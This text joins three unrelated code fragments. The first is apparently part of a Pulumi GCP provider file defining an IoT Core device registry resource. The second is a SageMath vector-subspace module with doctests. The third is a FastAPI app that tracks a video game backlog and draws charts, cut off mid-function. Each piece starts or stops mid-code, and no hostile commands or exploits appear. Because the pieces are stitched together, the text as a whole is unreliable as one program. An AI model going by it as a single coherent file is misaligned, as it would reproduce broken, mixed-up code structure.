state_notification_config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
__props__=None):
"""
A Google Cloud IoT Core device registry.
To get more information about DeviceRegistry, see:
* [API documentation](https://cloud.google.com/iot/docs/reference/cloudiot/rest/)
* How-to Guides
* [Official Documentation](https://cloud.google.com/iot/docs/)
## Example Usage
### Cloudiot Device Registry Basic
```python
import pulumi
import pulumi_gcp as gcp
test_registry = gcp.iot.Registry("test-registry")
```
### Cloudiot Device Registry Single Event Notification Configs
```python
import pulumi
import pulumi_gcp as gcp
default_telemetry = gcp.pubsub.Topic("default-telemetry")
test_registry = gcp.iot.Registry("test-registry", event_notification_configs=[gcp.iot.RegistryEventNotificationConfigItemArgs(
pubsub_topic_name=default_telemetry.id,
subfolder_matches="",
)])
```
### Cloudiot Device Registry Full
```python
import pulumi
import pulumi_gcp as gcp
default_devicestatus = gcp.pubsub.Topic("default-devicestatus")
default_telemetry = gcp.pubsub.Topic("default-telemetry")
additional_telemetry = gcp.pubsub.Topic("additional-telemetry")
test_registry = gcp.iot.Registry("test-registry",
event_notification_configs=[
gcp.iot.RegistryEventNotificationConfigItemArgs(
pubsub_topic_name=additional_telemetry.id,
subfolder_matches="test/path",
),
gcp.iot.RegistryEventNotificationConfigItemArgs(
pubsub_topic_name=default_telemetry.id,
subfolder_matches="",
),
],
state_notification_config={
"pubsub_topic_name": default_devicestatus.id,
},
mqtt_config={
"mqtt_enabled_state": "MQTT_ENABLED",
},
http_config={
"http_enabled_state": "HTTP_ENABLED",
},
log_level="INFO",
credentials=[gcp.iot.RegistryCredentialArgs(
public_key_certificate={
"format": "X509_CERTIFICATE_PEM",
"certificate": (lambda path: open(path).read())("test-fixtures/rsa_cert.pem"),
},
)])
```
## Import
DeviceRegistry can be imported using any of these accepted formats
```sh
$ pulumi import gcp:iot/registry:Registry default {{project}}/locations/{{region}}/registries/{{name}}
```
```sh
$ pulumi import gcp:iot/registry:Registry default {{project}}/{{region}}/{{name}}
```
```sh
$ pulumi import gcp:iot/registry:Registry default {{region}}/{{name}}
```
```sh
$ pulumi import gcp:iot/registry:Registry default {{name}}
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RegistryCredentialArgs']]]] credentials: List of public key certificates to authenticate devices.
The structure is documented below.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RegistryEventNotificationConfigItemArgs']]]] event_notification_configs: List of configurations for event notifications, such as PubSub topics
to publish device events to.
Structure is documented below.
:param pulumi.Input[Mapping[str, Any]] http_config: Activate or deactivate HTTP.
The structure is documented below.
:param pulumi.Input[str] log_level: The default logging verbosity for activity from devices in this
registry. Specifies which events should be written to logs. For
example, if the LogLevel is ERROR, only events that terminate in
errors will be logged. LogLevel is inclusive; enabling INFO logging
will also enable ERROR logging.
Default value is `NONE`.
Possible values are `NONE`, `ERROR`, `INFO`, and `DEBUG`.
:param pulumi.Input[Mapping[str, Any]] mqtt_config: Activate or deactivate MQTT.
The structure is documented below.
:param pulumi.Input[str] name: A unique name for the resource, required by device registry.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
:param pulumi.Input[str] region: The region in which the created registry should reside.
If it is not provided, the provider region is used.
:param pulumi.Input[Mapping[str, Any]] state_notification_config: A PubSub topic to publish device state updates.
The structure is documented below.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: Optional[RegistryArgs] = None,
opts: Optional[pulumi.ResourceOptions] = None):
"""
A Google Cloud IoT Core device registry.
To get more information about DeviceRegistry, see:
* [API documentation](https://cloud.google.com/iot/docs/reference/cloudiot/rest/)
* How-to Guides
* [Official Documentation](https://cloud.google.com/iot/docs/)
## Example Usage
### Cloudiot Device Registry Basic
```python
import pulumi
import pulumi_gcp as gcp
test_registry = gcp.iot.Registry("test-registry")
```
### Cloudiot Device Registry Single Event Notification Configs
```python
import pulumi
import pulumi_gcp as gcp
default_telemetry = gcp.pubsub.Topic("default-telemetry")
test_registry = gcp.iot.Registry("test-registry", event_notification_configs=[gcp.iot.RegistryEventNotificationConfigItemArgs(
pubsub_topic_name=default_telemetry.id,
subfolder_matches="",
)])
```
### Cloudiot Device Registry Full
```python
import pulumi
import pulumi_gcp as gcp
default_devicestatus = gcp.pubsub.Topic("default-devicestatus")
default_telemetry = gcp.pubsub.Topic("default-telemetry")
additional_telemetry = gcp.pubsub.Topic("additional-telemetry")
test_registry = gcp.iot.Registry("test-registry",
event_notification_configs=[
gcp.iot.RegistryEventNotificationConfigItemArgs(
pubsub_topic_name=additional_telemetry.id,
subfolder_matches="test/path",
),
gcp.iot.RegistryEventNotificationConfigItemArgs(
pubsub_topic_name=default_telemetry.id,
subfolder_matches="",
),
],
state_notification_config={
"pubsub_topic_name": default_devicestatus.id,
},
mqtt_config={
"mqtt_enabled_state": "MQTT_ENABLED",
},
http_config={
"http_enabled_state": "HTTP_ENABLED",
},
log_level="INFO",
credentials=[gcp.iot.RegistryCredentialArgs(
public_key_certificate={
"format": "X509_CERTIFICATE_PEM",
"certificate": (lambda path: open(path).read())("test-fixtures/rsa_cert.pem"),
},
)])
```
## Import
DeviceRegistry can be imported using any of these accepted formats
```sh
$ pulumi import gcp:iot/registry:Registry default {{project}}/locations/{{region}}/registries/{{name}}
```
```sh
$ pulumi import gcp:iot/registry:Registry default {{project}}/{{region}}/{{name}}
```
```sh
$ pulumi import gcp:iot/registry:Registry default {{region}}/{{name}}
```
```sh
$ pulumi import gcp:iot/registry:Registry default {{name}}
```
:param str resource_name: The name of the resource.
:param RegistryArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(RegistryArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
credentials: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RegistryCredentialArgs']]]]] = None,
event_notification_configs: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RegistryEventNotificationConfigItemArgs']]]]] = None,
http_config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
log_level: Optional[pulumi.Input[str]] = None,
mqtt_config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
state_notification_config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = RegistryArgs.__new__(RegistryArgs)
__props__.__dict__["credentials"] = credentials
__props__.__dict__["event_notification_configs"] = event_notification_configs
__props__.__dict__["http_config"] = http_config
__props__.__dict__["log_level"] = log_level
__props__.__dict__["mqtt_config"] = mqtt_config
__props__.__dict__["name"] = name
__props__.__dict__["project"] = project
__props__.__dict__["region"] = region
__props__.__dict__["state_notification_config"] = state_notification_config
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="gcp:kms/registry:Registry")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(Registry, __self__).__init__(
'gcp:iot/registry:Registry',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
credentials: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RegistryCredentialArgs']]]]] = None,
event_notification_configs: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RegistryEventNotificationConfigItemArgs']]]]] = None,
http_config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
log_level: Optional[pulumi.Input[str]] = None,
mqtt_config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
state_notification_config: Optional[pulumi.Input[Mapping[str, Any]]] = None) -> 'Registry':
"""
Get an existing Registry resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RegistryCredentialArgs']]]] credentials: List of public key certificates to authenticate devices.
The structure is documented below.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RegistryEventNotificationConfigItemArgs']]]] event_notification_configs: List of configurations for event notifications, such as PubSub topics
to publish device events to.
Structure is documented below.
:param pulumi.Input[Mapping[str, Any]] http_config: Activate or deactivate HTTP.
The structure is documented below.
:param pulumi.Input[str] log_level: The default logging verbosity for activity from devices in this
registry. Specifies which events should be written to logs. For
example, if the LogLevel is ERROR, only events that terminate in
errors will be logged. LogLevel is inclusive; enabling INFO logging
will also enable ERROR logging.
Default value is `NONE`.
Possible values are `NONE`, `ERROR`, `INFO`, and `DEBUG`.
:param pulumi.Input[Mapping[str, Any]] mqtt_config: Activate or deactivate MQTT.
The structure is documented below.
:param pulumi.Input[str] name: A unique name for the resource, required by device registry.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
:param pulumi.Input[str] region: The region in which the created registry should reside.
If it is not provided, the provider region is used.
:param pulumi.Input[Mapping[str, Any]] state_notification_config: A PubSub topic to publish device state updates.
The structure is documented below.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _RegistryState.__new__(_RegistryState)
__props__.__dict__["credentials"] = credentials
__props__.__dict__["event_notification_configs"] = event_notification_configs
__props__.__dict__["http_config"] = http_config
__props__.__dict__["log_level"] = log_level
__props__.__dict__["mqtt_config"] = mqtt_config
__props__.__dict__["name"] = name
__props__.__dict__["project"] = project
__props__.__dict__["region"] = region
__props__.__dict__["state_notification_config"] = state_notification_config
return | |
Generic tests, including saving and loading submodules and elements::
sage: TestSuite(W).run()
sage: K.<x> = FractionField(PolynomialRing(QQ,'x'))
sage: M = K^3; W = M.span_of_basis([[1,1,x]])
sage: TestSuite(W).run()
"""
def __init__(self, ambient, basis, check=True,
echelonize=False, echelonized_basis=None, already_echelonized=False):
"""
Create a vector space with given basis.
EXAMPLES::
sage: V = QQ^3
sage: W = V.span_of_basis([[1,2,3],[4,5,6]])
sage: W
Vector space of degree 3 and dimension 2 over Rational Field
User basis matrix:
[1 2 3]
[4 5 6]
"""
FreeModule_submodule_with_basis_pid.__init__(
self, ambient, basis=basis, check=check, echelonize=echelonize,
echelonized_basis=echelonized_basis, already_echelonized=already_echelonized)
def _repr_(self):
"""
The printing representation of self.
EXAMPLES::
sage: V = VectorSpace(QQ,5)
sage: U = V.submodule([ V.gen(i) - V.gen(0) for i in range(1,5) ])
sage: print U # indirect doctest
Vector space of degree 5 and dimension 4 over Rational Field
Basis matrix:
[ 1 0 0 0 -1]
[ 0 1 0 0 -1]
[ 0 0 1 0 -1]
[ 0 0 0 1 -1]
sage: print U._repr_()
Vector space of degree 5 and dimension 4 over Rational Field
Basis matrix:
[ 1 0 0 0 -1]
[ 0 1 0 0 -1]
[ 0 0 1 0 -1]
[ 0 0 0 1 -1]
The system representation can be overwritten, but leaves _repr_
unmodified.
::
sage: U.rename('U')
sage: print U
U
sage: print U._repr_()
Vector space of degree 5 and dimension 4 over Rational Field
Basis matrix:
[ 1 0 0 0 -1]
[ 0 1 0 0 -1]
[ 0 0 1 0 -1]
[ 0 0 0 1 -1]
Sparse vector spaces print this fact.
::
sage: VV = VectorSpace(QQ,5,sparse=True)
sage: UU = VV.submodule([ VV.gen(i) - VV.gen(0) for i in range(1,5) ])
sage: print UU # indirect doctest
Sparse vector space of degree 5 and dimension 4 over Rational Field
Basis matrix:
[ 1 0 0 0 -1]
[ 0 1 0 0 -1]
[ 0 0 1 0 -1]
[ 0 0 0 1 -1]
(Now clean up again.)
::
sage: U.reset_name()
sage: print U
Vector space of degree 5 and dimension 4 over Rational Field
Basis matrix:
[ 1 0 0 0 -1]
[ 0 1 0 0 -1]
[ 0 0 1 0 -1]
[ 0 0 0 1 -1]
"""
if self.is_sparse():
return "Sparse vector space of degree %s and dimension %s over %s\n"%(
self.degree(), self.dimension(), self.base_field()) + \
"User basis matrix:\n%s"%self.basis_matrix()
else:
return "Vector space of degree %s and dimension %s over %s\n"%(
self.degree(), self.dimension(), self.base_field()) + \
"User basis matrix:\n%s"%self.basis_matrix()
def _denominator(self, B):
"""
Given a list (of field elements) returns 1 as the common
denominator.
N.B.: This function is for internal use only!
EXAMPLES::
sage: U = QQ^3
sage: U
Vector space of dimension 3 over Rational Field
sage: U.denominator()
1
sage: V = U.span([[1,1/2,1/3], [-1/5,2/3,3]])
sage: V
Vector space of degree 3 and dimension 2 over Rational Field
Basis matrix:
[ 1 0 -5/3]
[ 0 1 4]
sage: W = U.submodule_with_basis([[1,1/2,1/3], [-1/5,2/3,3]])
sage: W
Vector space of degree 3 and dimension 2 over Rational Field
User basis matrix:
[ 1 1/2 1/3]
[-1/5 2/3 3]
sage: W._denominator(W.echelonized_basis_matrix().list())
1
"""
return 1
def _echelonized_basis(self, ambient, basis):
"""
Given the ambient space and a basis, constructs and caches the
__echelonized_basis_matrix and returns its rows.
N.B. This function is for internal use only!
EXAMPLES::
sage: M = ZZ^3
sage: N = M.submodule_with_basis([[1,1,0],[0,2,1]])
sage: N._echelonized_basis(M,N.basis())
[(1, 1, 0), (0, 2, 1)]
sage: V = QQ^3
sage: W = V.submodule_with_basis([[1,1,0],[0,2,1]])
sage: W._echelonized_basis(V,W.basis())
[(1, 0, -1/2), (0, 1, 1/2)]
"""
MAT = sage.matrix.matrix_space.MatrixSpace(
base_ring=ambient.base_ring(),
nrows=len(basis), ncols=ambient.degree(),
sparse=ambient.is_sparse())
A = MAT(basis)
E = A.echelon_form()
# Return the first rank rows (i.e., the nonzero rows).
return E.rows()[:E.rank()]
def is_ambient(self):
"""
Return False since this is not an ambient module.
EXAMPLES::
sage: V = QQ^3
sage: V.is_ambient()
True
sage: W = V.span_of_basis([[1,2,3],[4,5,6]])
sage: W.is_ambient()
False
"""
return False
class FreeModule_submodule_field(FreeModule_submodule_with_basis_field):
"""
An embedded vector subspace with echelonized basis.
EXAMPLES:
Since this is an embedded vector subspace with echelonized basis,
the echelon_coordinates() and user coordinates() agree::
sage: V = QQ^3
sage: W = V.span([[1,2,3],[4,5,6]])
sage: W
Vector space of degree 3 and dimension 2 over Rational Field
Basis matrix:
[ 1 0 -1]
[ 0 1 2]
::
sage: v = V([1,5,9])
sage: W.echelon_coordinates(v)
[1, 5]
sage: vector(QQ, W.echelon_coordinates(v)) * W.basis_matrix()
(1, 5, 9)
sage: v = V([1,5,9])
sage: W.coordinates(v)
[1, 5]
sage: vector(QQ, W.coordinates(v)) * W.basis_matrix()
(1, 5, 9)
"""
def __init__(self, ambient, gens, check=True, already_echelonized=False):
"""
Create an embedded vector subspace with echelonized basis.
EXAMPLES::
sage: V = QQ^3
sage: W = V.span([[1,2,3],[4,5,6]])
sage: W
Vector space of degree 3 and dimension 2 over Rational Field
Basis matrix:
[ 1 0 -1]
[ 0 1 2]
"""
if is_FreeModule(gens):
gens = gens.gens()
FreeModule_submodule_with_basis_field.__init__(self, ambient, basis=gens, check=check,
echelonize=not already_echelonized, already_echelonized=already_echelonized)
def _repr_(self):
"""
The default printing representation of self.
EXAMPLES::
sage: V = VectorSpace(QQ,5)
sage: U = V.submodule([ V.gen(i) - V.gen(0) for i in range(1,5) ])
sage: print U # indirect doctest
Vector space of degree 5 and dimension 4 over Rational Field
Basis matrix:
[ 1 0 0 0 -1]
[ 0 1 0 0 -1]
[ 0 0 1 0 -1]
[ 0 0 0 1 -1]
sage: print U._repr_()
Vector space of degree 5 and dimension 4 over Rational Field
Basis matrix:
[ 1 0 0 0 -1]
[ 0 1 0 0 -1]
[ 0 0 1 0 -1]
[ 0 0 0 1 -1]
The system representation can be overwritten, but leaves _repr_
unmodified.
::
sage: U.rename('U')
sage: print U
U
sage: print U._repr_()
Vector space of degree 5 and dimension 4 over Rational Field
Basis matrix:
[ 1 0 0 0 -1]
[ 0 1 0 0 -1]
[ 0 0 1 0 -1]
[ 0 0 0 1 -1]
Sparse vector spaces print this fact.
::
sage: VV = VectorSpace(QQ,5,sparse=True)
sage: UU = VV.submodule([ VV.gen(i) - VV.gen(0) for i in range(1,5) ])
sage: print UU # indirect doctest
Sparse vector space of degree 5 and dimension 4 over Rational Field
Basis matrix:
[ 1 0 0 0 -1]
[ 0 1 0 0 -1]
[ 0 0 1 0 -1]
[ 0 0 0 1 -1]
(Now clean up again.)
::
sage: U.reset_name()
sage: print U
Vector space of degree 5 and dimension 4 over Rational Field
Basis matrix:
[ 1 0 0 0 -1]
[ 0 1 0 0 -1]
[ 0 0 1 0 -1]
[ 0 0 0 1 -1]
"""
if self.is_sparse():
return "Sparse vector space of degree %s and dimension %s over %s\n"%(
self.degree(), self.dimension(), self.base_field()) + \
"Basis matrix:\n%s"%self.basis_matrix()
else:
return "Vector space of degree %s and dimension %s over %s\n"%(
self.degree(), self.dimension(), self.base_field()) + \
"Basis matrix:\n%s"%self.basis_matrix()
def echelon_coordinates(self, v, check=True):
"""
Write `v` in terms of the echelonized basis of self.
INPUT:
- ``v`` - vector
- ``check`` - bool (default: True); if True, also
verify that v is really in self.
OUTPUT: list
Returns a list `c` such that if `B` is the basis for self, then
.. math::
\sum c_i B_i = v.
If `v` is not in self, raises an ``ArithmeticError`` exception.
EXAMPLES::
sage: V = QQ^3
sage: W = V.span([[1,2,3],[4,5,6]])
sage: W
Vector space of degree 3 and dimension 2 over Rational Field
Basis matrix:
[ 1 0 -1]
[ 0 1 2]
::
sage: v = V([1,5,9])
sage: W.echelon_coordinates(v)
[1, 5]
sage: vector(QQ, W.echelon_coordinates(v)) * W.basis_matrix()
(1, 5, 9)
"""
if not isinstance(v, free_module_element.FreeModuleElement):
v = self.ambient_vector_space()(v)
if v.degree() != self.degree():
raise ArithmeticError, "v (=%s) is not in self"%v
E = self.echelonized_basis_matrix()
P = E.pivots()
if len(P) == 0:
if check and v != 0:
raise ArithmeticError, "vector is not in free module"
return []
w = v.list_from_positions(P)
if not check:
# It's really really easy.
return w
if v.parent() is self: # obvious | |
<reponame>AnnuityDew/tarpey-dev
# import Python packages
from datetime import datetime
from enum import Enum
import json
from typing import List, Optional
# import third party packages
from fastapi import APIRouter, Depends, HTTPException
from motor.motor_asyncio import AsyncIOMotorClient
import numpy
import pandas
import plotly
import plotly.express as px
from odmantic import AIOEngine, Field, Model, ObjectId, query
# import custom local stuff
from src.db.atlas import get_odm
from src.api.users import UserOut, oauth2_scheme
hysx_api = APIRouter(
prefix="/haveyouseenx",
tags=["haveyouseenx"],
)
class YesNo(str, Enum):
YES = "Y"
NO = "N"
class GameStatus(str, Enum):
NOT_STARTED = "Not Started"
STARTED = "Started"
BEATEN = "Beaten"
COMPLETED = "Completed"
MASTERED = "Mastered"
INFINITE = "Infinite"
WISH_LIST = "Wish List"
class PlaytimeCalc(str, Enum):
ACTUAL = "Actual"
ESTIMATE = "Estimate"
class BacklogGame(Model):
game_title: str
sub_title: Optional[str]
game_system: str
genre: str
dlc: YesNo
now_playing: YesNo
game_status: GameStatus
game_hours: Optional[int]
game_minutes: Optional[int]
playtime_calc: Optional[PlaytimeCalc]
add_date: Optional[datetime]
start_date: Optional[datetime]
beat_date: Optional[datetime]
complete_date: Optional[datetime]
game_notes: Optional[str]
class BacklogGamePatch(Model):
game_title: Optional[str]
sub_title: Optional[str]
game_system: Optional[str]
genre: Optional[str]
dlc: Optional[YesNo]
now_playing: Optional[YesNo]
game_status: Optional[GameStatus]
game_hours: Optional[int]
game_minutes: Optional[int]
playtime_calc: Optional[PlaytimeCalc]
add_date: Optional[datetime]
start_date: Optional[datetime]
beat_date: Optional[datetime]
complete_date: Optional[datetime]
game_notes: Optional[str]
@hysx_api.get('/annuitydew/game/all')
async def get_all_games(client: AsyncIOMotorClient = Depends(get_odm)):
engine = AIOEngine(motor_client=client, database="backlogs")
data = [game async for game in engine.find(BacklogGame, sort=BacklogGame.id)]
if data:
return data
else:
raise HTTPException(status_code=404, detail="No data found!")
@hysx_api.post('/annuitydew/game')
async def add_games(
doc_list: List[BacklogGame],
client: AsyncIOMotorClient = Depends(get_odm),
user: UserOut = Depends(oauth2_scheme),
):
engine = AIOEngine(motor_client=client, database="backlogs")
result = await engine.save_all(doc_list)
return {
"result": result,
}
@hysx_api.get('/annuitydew/game/{oid}', response_model=BacklogGame)
async def get_game(
oid: ObjectId,
client: AsyncIOMotorClient = Depends(get_odm),
user: UserOut = Depends(oauth2_scheme),
):
engine = AIOEngine(motor_client=client, database="backlogs")
game = await engine.find_one(BacklogGame, BacklogGame.id == oid)
if game:
return game
else:
raise HTTPException(status_code=404, detail="No data found!")
@hysx_api.patch('/annuitydew/game/{oid}')
async def edit_game(
oid: ObjectId,
patch: BacklogGamePatch,
client: AsyncIOMotorClient = Depends(get_odm),
user: UserOut = Depends(oauth2_scheme),
):
engine = AIOEngine(motor_client=client, database="backlogs")
game = await engine.find_one(BacklogGamePatch, BacklogGamePatch.id == oid)
if game is None:
raise HTTPException(status_code=404, detail="No data found!")
patch_dict = patch.dict(exclude_unset=True)
for attr, value in patch_dict.items():
setattr(game, attr, value)
result = await engine.save(game)
return {
"result": result,
}
@hysx_api.delete('/annuitydew/game/{oid}')
async def delete_game(
oid: ObjectId,
client: AsyncIOMotorClient = Depends(get_odm),
user: UserOut = Depends(oauth2_scheme),
):
engine = AIOEngine(motor_client=client, database="backlogs")
game = await engine.find_one(BacklogGame, BacklogGame.id == oid)
if game is None:
raise HTTPException(status_code=404, detail="No data found!")
await engine.delete(game)
return {
"game": game,
}
@hysx_api.get('/annuitydew/stats/counts')
async def count_by_status(client: AsyncIOMotorClient = Depends(get_odm)):
engine = AIOEngine(motor_client=client, database="backlogs")
collection = engine.get_collection(BacklogGame)
results = await collection.aggregate([{
'$group': {
'_id': '$game_status',
'count': {
'$sum': 1
}
}
}]).to_list(length=None)
stats = {result.get('_id'): result.get('count') for result in results}
sorted_stats = dict(sorted(stats.items(), key=lambda item: item[1], reverse=True))
return sorted_stats
@hysx_api.get('/annuitydew/stats/playtime')
async def playtime(client: AsyncIOMotorClient = Depends(get_odm)):
engine = AIOEngine(motor_client=client, database="backlogs")
collection = engine.get_collection(BacklogGame)
results = await collection.aggregate([{
'$group': {
'_id': None,
'total_hours': {
'$sum': '$game_hours'
},
'total_minutes': {
'$sum': '$game_minutes'
}
}
}]).to_list(length=None)
# move chunks of 60 minutes into the hours count
leftover_minutes = results[0].get('total_minutes') % 60
hours_to_move = (results[0].get('total_minutes') - leftover_minutes) / 60
results[0]['total_hours'] = int(results[0]['total_hours'] + hours_to_move)
results[0]['total_minutes'] = int(leftover_minutes)
return results[0]
@hysx_api.get('/annuitydew/search', response_model=List[BacklogGame])
async def search(
client: AsyncIOMotorClient = Depends(get_odm),
dlc: YesNo = None,
now_playing: YesNo = None,
game_status: GameStatus = None,
q: str = None,
):
engine = AIOEngine(motor_client=client, database="backlogs")
initial_args = {
'dlc': dlc,
'now_playing': now_playing,
'game_status': game_status,
}
final_args = { k:v for k, v in initial_args.items() if v is not None }
if final_args:
query_expression_list = [
(getattr(BacklogGame, key)) == value for key, value in final_args.items()
]
combined_query_expression = query.and_(*query_expression_list)
else:
combined_query_expression = False
# change to plain q for OR results. f"\"{q}\"" is an AND search.
if combined_query_expression:
results = await engine.find(
BacklogGame,
combined_query_expression,
sort=(BacklogGame.dlc, BacklogGame.id),
)
elif q == '' or q is None:
results = await engine.find(
BacklogGame,
sort=(BacklogGame.dlc, BacklogGame.id),
)
else:
results = await engine.find(
BacklogGame,
{ '$text': { '$search': f"\"{q}\"" }},
sort=(BacklogGame.dlc, BacklogGame.id),
)
return results
@hysx_api.get('/annuitydew/treemap')
async def system_treemap(backlog: List[BacklogGame] = Depends(get_all_games)):
# convert to pandas dataframe
backlog = pandas.DataFrame([game.doc() for game in backlog])
# read backlog and create a count column
backlog['count'] = 1
# column to serve as the root of the backlog
backlog['backlog'] = 'Backlog'
# complete gametime calc
backlog['game_hours'] = (
backlog['game_hours'] + (backlog['game_minutes'] / 60)
)
# pivot table by gameSystem and gameStatus.
# fill missing values with zeroes
system_status_df = backlog.groupby(
by=[
'backlog',
'game_system',
'game_status',
]
).agg(
{
'count': sum,
'game_hours': sum,
}
).reset_index()
figure = px.treemap(
system_status_df,
path=['backlog', 'game_status', 'game_system'],
values='count',
color=numpy.log10(system_status_df['game_hours']),
color_continuous_scale=px.colors.diverging.Spectral_r,
hover_data=['game_hours'],
)
# update margins and colors
figure.update_layout(
margin=dict(l=10, r=0, t=10, b=10),
)
figure.layout.coloraxis.colorbar = dict(
title='Hours',
tickvals=[1.0, 2.0, 3.0],
ticktext=[10, 100, 1000],
)
# convert to JSON for the web
return json.loads(plotly.io.to_json(figure))
@hysx_api.get('/annuitydew/bubbles')
async def system_bubbles(backlog: List[BacklogGame] = Depends(get_all_games)):
# convert to pandas dataframe
backlog = pandas.DataFrame([game.doc() for game in backlog])
# read backlog and create a count column
backlog['count_dist'] = 1
# complete gametime calc
backlog['game_hours'] = (
backlog['game_hours'] + (backlog['game_minutes'] / 60)
)
# pivot table by gameSystem and gameStatus.
# fill missing values with zeroes
system_status_df = backlog.groupby(
by=[
'game_system',
'game_status',
]
).agg(
{
'count_dist': sum,
'game_hours': sum,
}
)
# we also want the % in each category for each system
# this code takes care of that
system_totals = system_status_df.groupby(['game_system']).agg({'count_dist': sum})
normalized_df = system_status_df.div(system_totals, level='game_system')
normalized_df['game_hours'] = system_status_df['game_hours']
normalized_df['total_count'] = system_status_df['count_dist']
# now reset index and prep the data for JS
normalized_df.reset_index(inplace=True)
# x data for each status
x_data_counts = [
normalized_df.loc[
normalized_df.game_status == status
].total_count.tolist() for status in normalized_df.game_status.unique().tolist()
]
# y data for each status
y_data_dist = [
normalized_df.loc[
normalized_df.game_status == status
].count_dist.tolist() for status in normalized_df.game_status.unique().tolist()
]
# z data for each status
z_data_hours = [
normalized_df.loc[
normalized_df.game_status == status
].game_hours.tolist() for status in normalized_df.game_status.unique().tolist()
]
# systems for each status
label_data = [
normalized_df.loc[
normalized_df.game_status == status
].game_system.tolist() for status in normalized_df.game_status.unique().tolist()
]
# categories
bubble_names = normalized_df.game_status.unique().tolist()
# list of hex color codes
color_data = px.colors.qualitative.Bold
return {
'x_data_counts': x_data_counts,
'y_data_dist': y_data_dist,
'z_data_hours': z_data_hours,
'bubble_names': bubble_names,
'label_data': label_data,
'color_data': color_data,
}
@hysx_api.get('/annuitydew/timeline')
async def timeline(
backlog: List[BacklogGame] = Depends(get_all_games),
stats=Depends(count_by_status)
):
# convert to pandas dataframe
backlog = pandas.DataFrame([game.doc() for game in backlog])
# drop unused columns, move dates to x axis to create timeline
# sort for most recent event at the top
backlog = backlog[[
'_id',
'game_title',
'sub_title',
'add_date',
'start_date',
'beat_date',
'complete_date',
]].melt(
id_vars=['_id', 'game_title', 'sub_title'],
var_name='event_name',
value_name='event_date',
)
# fill empty cells with the backlog's birth date
backlog['event_date'] = (
backlog['event_date'].fillna(numpy.datetime64('2011-10-08T16:00:00'))
)
# event date to datetime
backlog.event_date = pandas.to_datetime(backlog.event_date, utc=True)
# sort by date descending
backlog.sort_values(['event_date', '_id', 'event_name'], ascending=False, inplace=True)
# reset index
backlog.reset_index(inplace=True)
# next, place current status counts in the first row.
# then we'll be able to calculate the backlog at older
# points in time using the timeline
backlog['not_started'] = stats.get('Not Started')
backlog['started'] = stats.get('Started')
backlog['beaten'] = stats.get('Beaten')
backlog['completed'] = stats.get('Completed')
backlog = backlog.assign(ns=0, s=0, b=0, c=0)
# initalize modifiers
mod_ns, mod_s, mod_b, mod_c = 0, 0, 0, 0
for row in backlog.itertuples():
backlog.at[row.Index, 'ns'] += mod_ns
backlog.at[row.Index, 's'] += mod_s
backlog.at[row.Index, 'b'] += mod_b
backlog.at[row.Index, 'c'] += mod_c
if row.event_name == 'add_date':
mod_ns += 1
elif row.event_name == 'start_date':
mod_ns -= 1
mod_s += 1
elif row.event_name == 'beat_date':
mod_s -= 1
mod_b += 1
elif row.event_name == 'complete_date':
mod_b -= 1
mod_c += 1
# now recalculate the timeline values. this is our final data
backlog['ns'] = backlog['not_started'] - backlog['ns']
backlog['s'] = backlog['started'] - backlog['s']
backlog['b'] = backlog['beaten'] - backlog['b']
backlog['c'] = backlog['completed'] - backlog['c']
# change sort to ascending and drop unnecessary columns
# set index to event date
backlog = backlog.sort_values(
['event_date', '_id', 'event_name'], ascending=True
)[['event_date', 'ns', 's', 'b', 'c']]
# drop duplicate dates (keep last, that will be most recent)
backlog.drop_duplicates(subset=['event_date'], keep='last', inplace=True)
# set event date as datetime index and resample to daily
# also drop the date column (it's the index now)
# and convert back to integers (resample changes dtype)
time_idx = pandas.DatetimeIndex(backlog.event_date)
backlog.set_index(time_idx, inplace=True)
backlog = backlog.resample('D').pad().drop(
columns='event_date'
).convert_dtypes()
# limit our chart to dates after the birth of the backlog
backlog = backlog[
pandas.Timestamp(
'2015-01-01 00:00:00+0000', tz='UTC', freq='D'
):
]
# x data is time, y_data is our timeline values
